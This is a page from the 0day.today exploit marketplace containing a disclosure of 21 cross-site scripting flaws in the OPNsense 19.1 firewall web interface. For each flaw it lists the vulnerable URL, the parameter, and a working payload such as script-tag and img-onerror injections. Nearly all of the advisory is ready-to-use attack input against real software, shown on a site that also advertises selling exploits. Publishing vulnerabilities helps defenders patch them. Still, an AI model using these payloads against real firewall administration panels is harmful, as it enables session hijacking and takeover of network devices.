0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OPNsense < 19.1.1 - Cross-Site Scripting Vulnerability
################################################################################################################################## # Exploit Title: OPNsense 19.1 | Cross-Site Scripting # Exploit Author: Ozer Goker # Vendor Homepage: https://opnsense.org # Software Link: http://mirror.ams1.nl.leaseweb.net/opnsense/releases/19.1/OPNsense-19.1-OpenSSL-dvd-amd64.iso.bz2 # Version: 19.1 ################################################################################################################################## Introduction OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based firewall and routing platform. OPNsense includes most of the features available in expensive commercial firewalls, and more in many cases. It brings the rich feature set of commercial offerings with the benefits of open and verifiable sources. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER GDrive_GDriveEmail PAYLOAD "><script>alert(1)</script> ################################################################################# XSS2 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER GDrive_GDriveFolderID PAYLOAD "><script>alert(2)</script> ################################################################################# XSS3 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER GDrive_GDriveBackupCount PAYLOAD "><script>alert(3)</script> ################################################################################# XSS4 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_url PAYLOAD "><script>alert(4)</script> ################################################################################# XSS5 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_user PAYLOAD "><script>alert(5)</script> ################################################################################# XSS6 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_password PAYLOAD "><script>alert(6)</script> ################################################################################# XSS7 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_password_encryption PAYLOAD "><script>alert(7)</script> ################################################################################# XSS8 | Reflected URL http://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_backupdir PAYLOAD "><script>alert(8)</script> ################################################################################# XSS9 | Stored URL http://192.168.2.200/system_advanced_sysctl.php?act=edit METHOD Post PARAMETER tunable PAYLOAD "><script>alert(9)</script> ################################################################################# XSS10 | Reflected URL http://192.168.2.200/system_advanced_sysctl.php?act=edit METHOD Post PARAMETER value PAYLOAD "><script>alert(10)</script> ################################################################################# XSS11 | Reflected URL http://192.168.2.200/interfaces_vlan_edit.php METHOD Post PARAMETER tag PAYLOAD "><script>alert(11)</script> ################################################################################# XSS2 | Reflected URL http://192.168.2.200/interfaces_vlan_edit.php METHOD Post PARAMETER descr PAYLOAD "><script>alert(12)</script> ################################################################################# XSS13 | Reflected URL http://192.168.2.200/interfaces_vlan_edit.php METHOD Post PARAMETER vlanif PAYLOAD "><script>alert(13)</script> ################################################################################# XSS14 | Reflected URL http://192.168.2.200/diag_ping.php METHOD Post PARAMETER host PAYLOAD "><script>alert(14)</script> ################################################################################# XSS15 | Reflected URL http://192.168.2.200/diag_traceroute.php METHOD Post PARAMETER host PAYLOAD "><script>alert(15)</script> ################################################################################# XSS16 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER category PAYLOAD "><script>alert(16)</script> ################################################################################# XSS17 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER category PAYLOAD "><script>alert(17)</script> ################################################################################# XSS18 | Stored URL http://192.168.2.200/firewall_rules_edit.php?if=wan METHOD Post PARAMETER category PAYLOAD "><script>alert(18)</script> ################################################################################# XSS19 | Reflected URL http://192.168.2.200/vpn_ipsec_settings.php METHOD Post PARAMETER passthrough_networks%5B%5D PAYLOAD <img%20src=x%20onerror=alert(19)> ################################################################################# XSS20 | Reflected URL http://192.168.2.200/ui/monit METHOD Post PARAMETER mailserver PAYLOAD <img src=x onerror=alert(20)> ################################################################################# XSS21 | Reflected URL http://192.168.2.200/ui/proxy METHOD Post PARAMETER ignoreLogACL PAYLOAD <img src=x onerror=alert(21)> ################################################################################# # 0day.today [2024-11-16] #